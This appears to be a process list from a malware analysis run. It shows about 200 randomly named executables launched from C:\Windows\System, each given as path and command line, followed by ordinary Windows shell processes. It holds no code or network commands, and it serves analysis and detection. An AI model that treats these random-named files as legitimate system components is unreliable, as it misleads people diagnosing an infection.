C:\Windows\System\akbfLKH.exe
C:\Windows\System\akbfLKH.exe
C:\Windows\System\iDHKrpj.exe
C:\Windows\System\iDHKrpj.exe
C:\Windows\System\goRDcKO.exe
C:\Windows\System\goRDcKO.exe
C:\Windows\System\aSdYOFy.exe
C:\Windows\System\aSdYOFy.exe
C:\Windows\System\BYBSAHo.exe
C:\Windows\System\BYBSAHo.exe
C:\Windows\System\Bberolm.exe
C:\Windows\System\Bberolm.exe
C:\Windows\System\CXEATij.exe
C:\Windows\System\CXEATij.exe
C:\Windows\System\EoPTdcg.exe
C:\Windows\System\EoPTdcg.exe
C:\Windows\System\txXFslG.exe
C:\Windows\System\txXFslG.exe
C:\Windows\System\MxMgtaL.exe
C:\Windows\System\MxMgtaL.exe
C:\Windows\System\SJqOjuw.exe
C:\Windows\System\SJqOjuw.exe
C:\Windows\System\rGRrVNe.exe
C:\Windows\System\rGRrVNe.exe
C:\Windows\System\xbCeaQX.exe
C:\Windows\System\xbCeaQX.exe
C:\Windows\System\wAtljkH.exe
C:\Windows\System\wAtljkH.exe
C:\Windows\System\WwPWEgv.exe
C:\Windows\System\WwPWEgv.exe
C:\Windows\System\QhQjAev.exe
C:\Windows\System\QhQjAev.exe
C:\Windows\System\Gmcpdva.exe
C:\Windows\System\Gmcpdva.exe
C:\Windows\System\rCZXWOf.exe
C:\Windows\System\rCZXWOf.exe
C:\Windows\System\tEcQnkL.exe
C:\Windows\System\tEcQnkL.exe
C:\Windows\System\alboXQv.exe
C:\Windows\System\alboXQv.exe
C:\Windows\System\FjEYcVf.exe
C:\Windows\System\FjEYcVf.exe
C:\Windows\System\BXLcEvR.exe
C:\Windows\System\BXLcEvR.exe
C:\Windows\System\RjLYkns.exe
C:\Windows\System\RjLYkns.exe
C:\Windows\System\ysjMjkN.exe
C:\Windows\System\ysjMjkN.exe
C:\Windows\System\paGjQXf.exe
C:\Windows\System\paGjQXf.exe
C:\Windows\System\tSzbdax.exe
C:\Windows\System\tSzbdax.exe
C:\Windows\System\oWIJNvO.exe
C:\Windows\System\oWIJNvO.exe
C:\Windows\System\PUmlwEs.exe
C:\Windows\System\PUmlwEs.exe
C:\Windows\System\XufBEub.exe
C:\Windows\System\XufBEub.exe
C:\Windows\System\INyDmBK.exe
C:\Windows\System\INyDmBK.exe
C:\Windows\System\vzhkoVv.exe
C:\Windows\System\vzhkoVv.exe
C:\Windows\System\JWGWvof.exe
C:\Windows\System\JWGWvof.exe
C:\Windows\System\prnlcSQ.exe
C:\Windows\System\prnlcSQ.exe
C:\Windows\System\PSPACOf.exe
C:\Windows\System\PSPACOf.exe
C:\Windows\System\ePeoUGe.exe
C:\Windows\System\ePeoUGe.exe
C:\Windows\System\lYgNimY.exe
C:\Windows\System\lYgNimY.exe
C:\Windows\System\wBTMpyw.exe
C:\Windows\System\wBTMpyw.exe
C:\Windows\System\cpptPay.exe
C:\Windows\System\cpptPay.exe
C:\Windows\System\fowcDbJ.exe
C:\Windows\System\fowcDbJ.exe
C:\Windows\System\VPzbwUI.exe
C:\Windows\System\VPzbwUI.exe
C:\Windows\System\jhvfBgu.exe
C:\Windows\System\jhvfBgu.exe
C:\Windows\System\ZecppyL.exe
C:\Windows\System\ZecppyL.exe
C:\Windows\System\HyKEQJf.exe
C:\Windows\System\HyKEQJf.exe
C:\Windows\System\zEpMNwY.exe
C:\Windows\System\zEpMNwY.exe
C:\Windows\System\CEqZsMl.exe
C:\Windows\System\CEqZsMl.exe
C:\Windows\System\EGmlRuF.exe
C:\Windows\System\EGmlRuF.exe
C:\Windows\System\IiYLeDD.exe
C:\Windows\System\IiYLeDD.exe
C:\Windows\System\mhWavJV.exe
C:\Windows\System\mhWavJV.exe
C:\Windows\System\ylHeALw.exe
C:\Windows\System\ylHeALw.exe
C:\Windows\System\xeKPPom.exe
C:\Windows\System\xeKPPom.exe
C:\Windows\System\eNSiqGy.exe
C:\Windows\System\eNSiqGy.exe
C:\Windows\System\qlHqwaF.exe
C:\Windows\System\qlHqwaF.exe
C:\Windows\System\yFlovAW.exe
C:\Windows\System\yFlovAW.exe
C:\Windows\System\qFBkVCb.exe
C:\Windows\System\qFBkVCb.exe
C:\Windows\System\LOhYOyd.exe
C:\Windows\System\LOhYOyd.exe
C:\Windows\System\soovSsH.exe
C:\Windows\System\soovSsH.exe
C:\Windows\System\LMAmKDf.exe
C:\Windows\System\LMAmKDf.exe
C:\Windows\System\OZmWVel.exe
C:\Windows\System\OZmWVel.exe
C:\Windows\System\YqfyIQa.exe
C:\Windows\System\YqfyIQa.exe
C:\Windows\System\qDKymHQ.exe
C:\Windows\System\qDKymHQ.exe
C:\Windows\System\YIuBHtH.exe
C:\Windows\System\YIuBHtH.exe
C:\Windows\System\uETHikt.exe
C:\Windows\System\uETHikt.exe
C:\Windows\System\sxwyJXg.exe
C:\Windows\System\sxwyJXg.exe
C:\Windows\System\cBwMvBH.exe
C:\Windows\System\cBwMvBH.exe
C:\Windows\System\ltnZYsZ.exe
C:\Windows\System\ltnZYsZ.exe
C:\Windows\System\CAdMOCl.exe
C:\Windows\System\CAdMOCl.exe
C:\Windows\System\QMasbep.exe
C:\Windows\System\QMasbep.exe
C:\Windows\System\oBybvxG.exe
C:\Windows\System\oBybvxG.exe
C:\Windows\System\uydgBwf.exe
C:\Windows\System\uydgBwf.exe
C:\Windows\System\sHfjsYa.exe
C:\Windows\System\sHfjsYa.exe
C:\Windows\System\wCcYYRn.exe
C:\Windows\System\wCcYYRn.exe
C:\Windows\System\vfrbHnv.exe
C:\Windows\System\vfrbHnv.exe
C:\Windows\System\YErxUsG.exe
C:\Windows\System\YErxUsG.exe
C:\Windows\System\uMKQllG.exe
C:\Windows\System\uMKQllG.exe
C:\Windows\System\ZlnQyVp.exe
C:\Windows\System\ZlnQyVp.exe
C:\Windows\System\PHgpdud.exe
C:\Windows\System\PHgpdud.exe
C:\Windows\System\ZNsBWNJ.exe
C:\Windows\System\ZNsBWNJ.exe
C:\Windows\System\UosCROv.exe
C:\Windows\System\UosCROv.exe
C:\Windows\System\dmSADyI.exe
C:\Windows\System\dmSADyI.exe
C:\Windows\System\INfnrML.exe
C:\Windows\System\INfnrML.exe
C:\Windows\System\SikQKSN.exe
C:\Windows\System\SikQKSN.exe
C:\Windows\System\nSvbCxU.exe
C:\Windows\System\nSvbCxU.exe
C:\Windows\System\lnMWHVG.exe
C:\Windows\System\lnMWHVG.exe
C:\Windows\System\PemrgQB.exe
C:\Windows\System\PemrgQB.exe
C:\Windows\System\wkzokUY.exe
C:\Windows\System\wkzokUY.exe
C:\Windows\System\ZAljyEX.exe
C:\Windows\System\ZAljyEX.exe
C:\Windows\System\oJklczx.exe
C:\Windows\System\oJklczx.exe
C:\Windows\System\ZQzrJhr.exe
C:\Windows\System\ZQzrJhr.exe
C:\Windows\System\rnMIomp.exe
C:\Windows\System\rnMIomp.exe
C:\Windows\System\YiBtDck.exe
C:\Windows\System\YiBtDck.exe
C:\Windows\System\RaNpiUI.exe
C:\Windows\System\RaNpiUI.exe
C:\Windows\System\OmKaKcJ.exe
C:\Windows\System\OmKaKcJ.exe
C:\Windows\System\RfigDMP.exe
C:\Windows\System\RfigDMP.exe
C:\Windows\System\LCuHvjg.exe
C:\Windows\System\LCuHvjg.exe
C:\Windows\System\ZonnvUY.exe
C:\Windows\System\ZonnvUY.exe
C:\Windows\System\QxPTKgh.exe
C:\Windows\System\QxPTKgh.exe
C:\Windows\System\bwIiVlw.exe
C:\Windows\System\bwIiVlw.exe
C:\Windows\System\twGtgSd.exe
C:\Windows\System\twGtgSd.exe
C:\Windows\System\xnEhCyH.exe
C:\Windows\System\xnEhCyH.exe
C:\Windows\System\nFnClEr.exe
C:\Windows\System\nFnClEr.exe
C:\Windows\System\MbCcmNh.exe
C:\Windows\System\MbCcmNh.exe
C:\Windows\System\wrSXOgL.exe
C:\Windows\System\wrSXOgL.exe
C:\Windows\System\iaUfzGy.exe
C:\Windows\System\iaUfzGy.exe
C:\Windows\System\iFcGpOk.exe
C:\Windows\System\iFcGpOk.exe
C:\Windows\System\SuSlbuW.exe
C:\Windows\System\SuSlbuW.exe
C:\Windows\System\SeAluKd.exe
C:\Windows\System\SeAluKd.exe
C:\Windows\System\AIyoNjs.exe
C:\Windows\System\AIyoNjs.exe
C:\Windows\System\allSlZW.exe
C:\Windows\System\allSlZW.exe
C:\Windows\System\cisboJs.exe
C:\Windows\System\cisboJs.exe
C:\Windows\System\PqKKDRL.exe
C:\Windows\System\PqKKDRL.exe
C:\Windows\System\rwtKPBU.exe
C:\Windows\System\rwtKPBU.exe
C:\Windows\System\GdLPwNU.exe
C:\Windows\System\GdLPwNU.exe
C:\Windows\System\hZNRdHN.exe
C:\Windows\System\hZNRdHN.exe
C:\Windows\System\rIYuFTM.exe
C:\Windows\System\rIYuFTM.exe
C:\Windows\System\RwnQavo.exe
C:\Windows\System\RwnQavo.exe
C:\Windows\System\EAuDzJI.exe
C:\Windows\System\EAuDzJI.exe
C:\Windows\System\tuexMRS.exe
C:\Windows\System\tuexMRS.exe
C:\Windows\System\XfzxFSF.exe
C:\Windows\System\XfzxFSF.exe
C:\Windows\System\kueodiU.exe
C:\Windows\System\kueodiU.exe
C:\Windows\System\VyPBbgm.exe
C:\Windows\System\VyPBbgm.exe
C:\Windows\System\qmKRwVy.exe
C:\Windows\System\qmKRwVy.exe
C:\Windows\System\kOSCsCY.exe
C:\Windows\System\kOSCsCY.exe
C:\Windows\System\hEYorIo.exe
C:\Windows\System\hEYorIo.exe
C:\Windows\System\TBHoNcX.exe
C:\Windows\System\TBHoNcX.exe
C:\Windows\System\cTdHZmb.exe
C:\Windows\System\cTdHZmb.exe
C:\Windows\System\XJEIDqd.exe
C:\Windows\System\XJEIDqd.exe
C:\Windows\System\ujYLhnD.exe
C:\Windows\System\ujYLhnD.exe
C:\Windows\System\KgjyTXp.exe
C:\Windows\System\KgjyTXp.exe
C:\Windows\System\GeKuEIA.exe
C:\Windows\System\GeKuEIA.exe
C:\Windows\System\OpsbWxh.exe
C:\Windows\System\OpsbWxh.exe
C:\Windows\System\BEllhzF.exe
C:\Windows\System\BEllhzF.exe
C:\Windows\System\rkFrpOp.exe
C:\Windows\System\rkFrpOp.exe
C:\Windows\System\SEylcxj.exe
C:\Windows\System\SEylcxj.exe
C:\Windows\System\IzHQsdz.exe
C:\Windows\System\IzHQsdz.exe
C:\Windows\System\BfAKDrC.exe
C:\Windows\System\BfAKDrC.exe
C:\Windows\System\eQclzNx.exe
C:\Windows\System\eQclzNx.exe
C:\Windows\System\VjhmHYO.exe
C:\Windows\System\VjhmHYO.exe
C:\Windows\System\HcllsaD.exe
C:\Windows\System\HcllsaD.exe
C:\Windows\System\HVyCYxC.exe
C:\Windows\System\HVyCYxC.exe
C:\Windows\System\kYEnRVp.exe
C:\Windows\System\kYEnRVp.exe
C:\Windows\System\lpWKJWt.exe
C:\Windows\System\lpWKJWt.exe
C:\Windows\System\qrpAKSD.exe
C:\Windows\System\qrpAKSD.exe
C:\Windows\System\bdmcsGZ.exe
C:\Windows\System\bdmcsGZ.exe
C:\Windows\System\MqzRUVV.exe
C:\Windows\System\MqzRUVV.exe
C:\Windows\System\LKPyLnw.exe
C:\Windows\System\LKPyLnw.exe
C:\Windows\System\bIZFiQg.exe
C:\Windows\System\bIZFiQg.exe
C:\Windows\System\vlHUmPa.exe
C:\Windows\System\vlHUmPa.exe
C:\Windows\System\uCASFpA.exe
C:\Windows\System\uCASFpA.exe
C:\Windows\System\jnKjWmf.exe
C:\Windows\System\jnKjWmf.exe
C:\Windows\System\TfmWMvd.exe
C:\Windows\System\TfmWMvd.exe
C:\Windows\System\rXCkxCW.exe
C:\Windows\System\rXCkxCW.exe
C:\Windows\System\bAnYxyE.exe
C:\Windows\System\bAnYxyE.exe
C:\Windows\System\nzBtXrt.exe
C:\Windows\System\nzBtXrt.exe
C:\Windows\System\DjwSLVi.exe
C:\Windows\System\DjwSLVi.exe
C:\Windows\System\wKAKODH.exe
C:\Windows\System\wKAKODH.exe
C:\Windows\System\FfAzJyb.exe
C:\Windows\System\FfAzJyb.exe
C:\Windows\System\HlViEdc.exe
C:\Windows\System\HlViEdc.exe
C:\Windows\System\HlZsDxC.exe
C:\Windows\System\HlZsDxC.exe
C:\Windows\System\bzNFziS.exe
C:\Windows\System\bzNFziS.exe
C:\Windows\System\DScyaXr.exe
C:\Windows\System\DScyaXr.exe
C:\Windows\System\ioRgcxi.exe
C:\Windows\System\ioRgcxi.exe
C:\Windows\System\iYVbreW.exe
C:\Windows\System\iYVbreW.exe
C:\Windows\System\ROhqwDd.exe
C:\Windows\System\ROhqwDd.exe
C:\Windows\System\IRKkwsX.exe
C:\Windows\System\IRKkwsX.exe
C:\Windows\System\sapepnV.exe
C:\Windows\System\sapepnV.exe
C:\Windows\System\ZZhiDns.exe
C:\Windows\System\ZZhiDns.exe
C:\Windows\System\tZJNpQG.exe
C:\Windows\System\tZJNpQG.exe
C:\Windows\System\rEdEXDL.exe
C:\Windows\System\rEdEXDL.exe
C:\Windows\System\nWIgZFr.exe
C:\Windows\System\nWIgZFr.exe
C:\Windows\System\QGcwBpN.exe
C:\Windows\System\QGcwBpN.exe
C:\Windows\System\CtRtFJl.exe
C:\Windows\System\CtRtFJl.exe
C:\Windows\System\OJfpgcE.exe
C:\Windows\System\OJfpgcE.exe
C:\Windows\System\GAmPlVt.exe
C:\Windows\System\GAmPlVt.exe
C:\Windows\System\rsQgQFp.exe
C:\Windows\System\rsQgQFp.exe
C:\Windows\System\WEzjUXz.exe
C:\Windows\System\WEzjUXz.exe
C:\Windows\System\xfFKWYy.exe
C:\Windows\System\xfFKWYy.exe
C:\Windows\System\VIZERMu.exe
C:\Windows\System\VIZERMu.exe
C:\Windows\System\gginVZt.exe
C:\Windows\System\gginVZt.exe
C:\Windows\System\KugihFO.exe
C:\Windows\System\KugihFO.exe
C:\Windows\System\fdHEqIP.exe
C:\Windows\System\fdHEqIP.exe
C:\Windows\System\kdXFWoh.exe
C:\Windows\System\kdXFWoh.exe
C:\Windows\System\NMbSdwD.exe
C:\Windows\System\NMbSdwD.exe
C:\Windows\System\FfcpFoS.exe
C:\Windows\System\FfcpFoS.exe
C:\Windows\System\JOsluYl.exe
C:\Windows\System\JOsluYl.exe
C:\Windows\System\LACHRMC.exe
C:\Windows\System\LACHRMC.exe
C:\Windows\System\zzvYMNW.exe
C:\Windows\System\zzvYMNW.exe
C:\Windows\System\NBjKdVL.exe
C:\Windows\System\NBjKdVL.exe
C:\Windows\System\JuqlrKX.exe
C:\Windows\System\JuqlrKX.exe
C:\Windows\System\MEhswra.exe
C:\Windows\System\MEhswra.exe
C:\Windows\System\mIssLFm.exe
C:\Windows\System\mIssLFm.exe
C:\Windows\System\HCEmWfh.exe
C:\Windows\System\HCEmWfh.exe
C:\Windows\System\BVDjAQW.exe
C:\Windows\System\BVDjAQW.exe
C:\Windows\System\oCscLAI.exe
C:\Windows\System\oCscLAI.exe
C:\Windows\System\iLEJggr.exe
C:\Windows\System\iLEJggr.exe
C:\Windows\System\Meozbgh.exe
C:\Windows\System\Meozbgh.exe
C:\Windows\System\IFzSZQC.exe
C:\Windows\System\IFzSZQC.exe
C:\Windows\System\mADZgsj.exe
C:\Windows\System\mADZgsj.exe
C:\Windows\System\WtuxEeh.exe
C:\Windows\System\WtuxEeh.exe
C:\Windows\System\WABSUAH.exe
C:\Windows\System\WABSUAH.exe
C:\Windows\System\QhxywFp.exe
C:\Windows\System\QhxywFp.exe
C:\Windows\System\rEebLef.exe
C:\Windows\System\rEebLef.exe
C:\Windows\System\cVvZgPf.exe
C:\Windows\System\cVvZgPf.exe
C:\Windows\System\aTXRbfw.exe
C:\Windows\System\aTXRbfw.exe
C:\Windows\System\nEMCIgZ.exe
C:\Windows\System\nEMCIgZ.exe
C:\Windows\System\puhlhVg.exe
C:\Windows\System\puhlhVg.exe
C:\Windows\System\GVkiYCU.exe
C:\Windows\System\GVkiYCU.exe
C:\Windows\System\CBeaDib.exe
C:\Windows\System\CBeaDib.exe
C:\Windows\System\PoDNrev.exe
C:\Windows\System\PoDNrev.exe
C:\Windows\System\eFtJMFU.exe
C:\Windows\System\eFtJMFU.exe
C:\Windows\System\WKcxpFG.exe
C:\Windows\System\WKcxpFG.exe
C:\Windows\System\OGVyNSm.exe
C:\Windows\System\OGVyNSm.exe
C:\Windows\System\aFMBifA.exe
C:\Windows\System\aFMBifA.exe
C:\Windows\System\uWlzFPR.exe
C:\Windows\System\uWlzFPR.exe
C:\Windows\System\CRtRlnX.exe
C:\Windows\System\CRtRlnX.exe
C:\Windows\System\xTkckoJ.exe
C:\Windows\System\xTkckoJ.exe
C:\Windows\System\FubDbFM.exe
C:\Windows\System\FubDbFM.exe
C:\Windows\System\NuhVSFp.exe
C:\Windows\System\NuhVSFp.exe
C:\Windows\System\ByHxEmr.exe
C:\Windows\System\ByHxEmr.exe
C:\Windows\System\oMHOqKa.exe
C:\Windows\System\oMHOqKa.exe
C:\Windows\System\HoxBHYp.exe
C:\Windows\System\HoxBHYp.exe
C:\Windows\System\lEBpGlp.exe
C:\Windows\System\lEBpGlp.exe
C:\Windows\System\ttatLJN.exe
C:\Windows\System\ttatLJN.exe
C:\Windows\System\AmHRpLA.exe
C:\Windows\System\AmHRpLA.exe
C:\Windows\System\JHrMMZm.exe
C:\Windows\System\JHrMMZm.exe
C:\Windows\System\wYUGYuP.exe
C:\Windows\System\wYUGYuP.exe
C:\Windows\System\IpxswQK.exe
C:\Windows\System\IpxswQK.exe
C:\Windows\System\vYFXuuE.exe
C:\Windows\System\vYFXuuE.exe
C:\Windows\System\FsDxPts.exe
C:\Windows\System\FsDxPts.exe
C:\Windows\System\InVCCcQ.exe
C:\Windows\System\InVCCcQ.exe
C:\Windows\System\khHRxbK.exe
C:\Windows\System\khHRxbK.exe
C:\Windows\System\nFaMFxl.exe
C:\Windows\System\nFaMFxl.exe
C:\Windows\System\PoOrzLA.exe
C:\Windows\System\PoOrzLA.exe
C:\Windows\System\KBUrKNM.exe
C:\Windows\System\KBUrKNM.exe
C:\Windows\System\pASsukt.exe
C:\Windows\System\pASsukt.exe
C:\Windows\System\WpupBFk.exe
C:\Windows\System\WpupBFk.exe
C:\Windows\System\YIfrbQG.exe
C:\Windows\System\YIfrbQG.exe
C:\Windows\System\bXtJAgB.exe
C:\Windows\System\bXtJAgB.exe
C:\Windows\System\NaFOxes.exe
C:\Windows\System\NaFOxes.exe
C:\Windows\System\sleCYRl.exe
C:\Windows\System\sleCYRl.exe
C:\Windows\System\pKwXJmL.exe
C:\Windows\System\pKwXJmL.exe
C:\Windows\System\PjsXqno.exe
C:\Windows\System\PjsXqno.exe
C:\Windows\System\FGhmuKU.exe
C:\Windows\System\FGhmuKU.exe
C:\Windows\System\QmzIzxI.exe
C:\Windows\System\QmzIzxI.exe
C:\Windows\System\cSzKthT.exe
C:\Windows\System\cSzKthT.exe
C:\Windows\System\mJFaefW.exe
C:\Windows\System\mJFaefW.exe
C:\Windows\System\BYRTdia.exe
C:\Windows\System\BYRTdia.exe
C:\Windows\System\RmWlnCe.exe
C:\Windows\System\RmWlnCe.exe
C:\Windows\System\hudfrka.exe
C:\Windows\System\hudfrka.exe
C:\Windows\System\hJJOCFq.exe
C:\Windows\System\hJJOCFq.exe
C:\Windows\System\sygkaLW.exe
C:\Windows\System\sygkaLW.exe
C:\Windows\System\Ogkhvrr.exe
C:\Windows\System\Ogkhvrr.exe
C:\Windows\System\VOlTAZA.exe
C:\Windows\System\VOlTAZA.exe
C:\Windows\System\zixXBfQ.exe
C:\Windows\System\zixXBfQ.exe
C:\Windows\System\HPntbqb.exe
C:\Windows\System\HPntbqb.exe
C:\Windows\System\smtLRKO.exe
C:\Windows\System\smtLRKO.exe
C:\Windows\System\zvwVrXh.exe
C:\Windows\System\zvwVrXh.exe
C:\Windows\System\lZJanSI.exe
C:\Windows\System\lZJanSI.exe
C:\Windows\System\BSccXmY.exe
C:\Windows\System\BSccXmY.exe
C:\Windows\System\dssYNDW.exe
C:\Windows\System\dssYNDW.exe
C:\Windows\System\vKbJmnn.exe
C:\Windows\System\vKbJmnn.exe
C:\Windows\System\BaVORPZ.exe
C:\Windows\System\BaVORPZ.exe
C:\Windows\System\iPjWTBf.exe
C:\Windows\System\iPjWTBf.exe
C:\Windows\System\GXjVuFv.exe
C:\Windows\System\GXjVuFv.exe
C:\Windows\System\yEzcPhc.exe
C:\Windows\System\yEzcPhc.exe
C:\Windows\System\OtisaBt.exe
C:\Windows\System\OtisaBt.exe
C:\Windows\System\pLfaBbG.exe
C:\Windows\System\pLfaBbG.exe
C:\Windows\System\SBATMlz.exe
C:\Windows\System\SBATMlz.exe
C:\Windows\System\fyWhaJq.exe
C:\Windows\System\fyWhaJq.exe
C:\Windows\System\YEsfSkV.exe
C:\Windows\System\YEsfSkV.exe
C:\Windows\System\fnaANsp.exe
C:\Windows\System\fnaANsp.exe
C:\Windows\System\sPXjbAB.exe
C:\Windows\System\sPXjbAB.exe
C:\Windows\System\ergzvVe.exe
C:\Windows\System\ergzvVe.exe
C:\Windows\System\TydwMcE.exe
C:\Windows\System\TydwMcE.exe
C:\Windows\System\VmXPZuX.exe
C:\Windows\System\VmXPZuX.exe
C:\Windows\System\jeRRrCP.exe
C:\Windows\System\jeRRrCP.exe
C:\Windows\System\korFeDU.exe
C:\Windows\System\korFeDU.exe
C:\Windows\System\gepKOsa.exe
C:\Windows\System\gepKOsa.exe
C:\Windows\System\bzLgfMT.exe
C:\Windows\System\bzLgfMT.exe
C:\Windows\System\AAfPBKe.exe
C:\Windows\System\AAfPBKe.exe
C:\Windows\System\bqAUqoL.exe
C:\Windows\System\bqAUqoL.exe
C:\Windows\System\wlDCJwO.exe
C:\Windows\System\wlDCJwO.exe
C:\Windows\System\CVrHTum.exe
C:\Windows\System\CVrHTum.exe
C:\Windows\System\qeMvqLC.exe
C:\Windows\System\qeMvqLC.exe
C:\Windows\System\yrlycsI.exe
C:\Windows\System\yrlycsI.exe
C:\Windows\System\agJzqhA.exe
C:\Windows\System\agJzqhA.exe
C:\Windows\System\UPKJfyZ.exe
C:\Windows\System\UPKJfyZ.exe
C:\Windows\System\tXGTdwY.exe
C:\Windows\System\tXGTdwY.exe
C:\Windows\System\LlenIKR.exe
C:\Windows\System\LlenIKR.exe
C:\Windows\System\LKqRLkC.exe
C:\Windows\System\LKqRLkC.exe
C:\Windows\System\YbWGCth.exe
C:\Windows\System\YbWGCth.exe
C:\Windows\System\OVjpntr.exe
C:\Windows\System\OVjpntr.exe
C:\Windows\System\BGvyxiC.exe
C:\Windows\System\BGvyxiC.exe
C:\Windows\System\jJBYdgJ.exe
C:\Windows\System\jJBYdgJ.exe
C:\Windows\System\MUDwKcA.exe
C:\Windows\System\MUDwKcA.exe
C:\Windows\System\hWQBmxG.exe
C:\Windows\System\hWQBmxG.exe
C:\Windows\System\aGptNDo.exe
C:\Windows\System\aGptNDo.exe
C:\Windows\System\ncXSnKO.exe
C:\Windows\System\ncXSnKO.exe
C:\Windows\System\tfMPRlH.exe
C:\Windows\System\tfMPRlH.exe
C:\Windows\System\HUtmZir.exe
C:\Windows\System\HUtmZir.exe
C:\Windows\System\nObeypJ.exe
C:\Windows\System\nObeypJ.exe
C:\Windows\System\RCpKvyL.exe
C:\Windows\System\RCpKvyL.exe
C:\Windows\System\eHwRdNN.exe
C:\Windows\System\eHwRdNN.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5000" "2936" "2848" "2940" "0" "0" "2944" "0" "0" "0" "0" "0"
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
